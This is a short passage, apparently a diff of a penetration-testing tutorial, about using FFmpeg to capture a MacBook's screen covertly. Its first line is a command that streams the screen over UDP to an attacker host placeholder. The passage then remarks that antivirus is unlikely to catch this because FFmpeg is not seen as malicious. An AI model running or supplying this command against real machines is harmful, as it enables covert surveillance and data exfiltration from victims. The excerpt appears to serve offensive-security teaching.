 ./ffmpeg -f avfoundation -i "1" -threads 1 -f avi -r 1 udp://ATTACKER-IP-ADDRESS:PORT

 FFmpeg is full options which may improve the video quality and CPU usage on the MacBook.
 I encourage readers to experiment with all of the available arguments and features.
 In Kali, the FFmpeg manual can be viewed using the below command.

-It's likely that antivirus software won't defend against these types of attacks.
+It's unlikely that antivirus software will defend against these types of attacks.
 After all, FFmpeg isn't considered a malicious application, and it doesn't attempt to open ports or change any files on the computer.